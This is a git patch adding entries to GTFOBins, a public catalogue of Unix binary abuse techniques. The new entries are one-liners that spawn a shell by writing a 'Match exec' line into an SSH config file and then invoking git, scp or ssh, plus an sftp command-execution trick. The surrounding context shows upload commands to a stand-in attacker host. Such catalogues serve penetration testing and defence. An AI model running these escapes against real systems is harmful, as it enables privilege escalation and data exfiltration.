From c0de447727a5c65e1714d6e06250d11047b05003 Mon Sep 17 00:00:00 2001
From: IgnifexLabs <hi@ignifexlabs.com​>
Date: Thu, 12 Mar 2026 16:26:49 +0100
Subject: [PATCH] Included 4 new methods for generating a shell. all related to
 the misuse of ssh config file. It has been tested on git, scp, sftp and ssh

---
 _gtfobins/git  | 7 +++++++
 _gtfobins/scp  | 7 +++++++
 _gtfobins/sftp | 8 ++++++++
 _gtfobins/ssh  | 7 +++++++
 4 files changed, 29 insertions(+)

diff --git a/_gtfobins/git b/_gtfobins/git
index b4d04158..37e1ff28 100644
--- a/_gtfobins/git
+++ b/_gtfobins/git
@@ -66,4 +66,11 @@ functions:
           git --exec-path=. x -p
         shell: false
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; GIT_SSH_COMMAND="ssh -F ~/.ssh/config" git clone user@host:repo.git
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:           
 ...
diff --git a/_gtfobins/scp b/_gtfobins/scp
index f494909f..e676f16d 100644
--- a/_gtfobins/scp
+++ b/_gtfobins/scp
@@ -25,6 +25,13 @@ functions:
       suid:
         shell: true
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; scp -F ~/.ssh/config localhost:~/.ssh/config localhost
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:           
   upload:
   - code: |-
       scp /path/to/input-file user@attacker.com:/path/to/output-file
diff --git a/_gtfobins/sftp b/_gtfobins/sftp
index 9ef28bff..3eefd0d8 100644
--- a/_gtfobins/sftp
+++ b/_gtfobins/sftp
@@ -29,4 +29,12 @@ functions:
       suid:
       unprivileged:
     receiver: ssh-server
+  command:
+  - code: |-
+      sftp -D /usr/bin/nautilus localhost
+    comment: |-
+      Executes the command provided you don't need to provide the whole path. 
+    contexts:
+      sudo:
+      unprivileged:        
 ...
diff --git a/_gtfobins/ssh b/_gtfobins/ssh
index 5142bb9e..99ddab73 100644
--- a/_gtfobins/ssh
+++ b/_gtfobins/ssh
@@ -38,6 +38,13 @@ functions:
     contexts:
       sudo:
       unprivileged:
+  - code: |-
+      echo 'Match exec "/bin/sh 0<&2 1>&2"' > "$HOME/.ssh/config"; ssh -F ~/.ssh/config localhost
+    comment: |-
+      Spawns the shell on the client, doesn't have to be the official config file location
+    contexts:
+      sudo:
+      unprivileged:       
   upload:
   - code: |-
       echo DATA | ssh user@attacker.com 'cat >/path/to/output-file"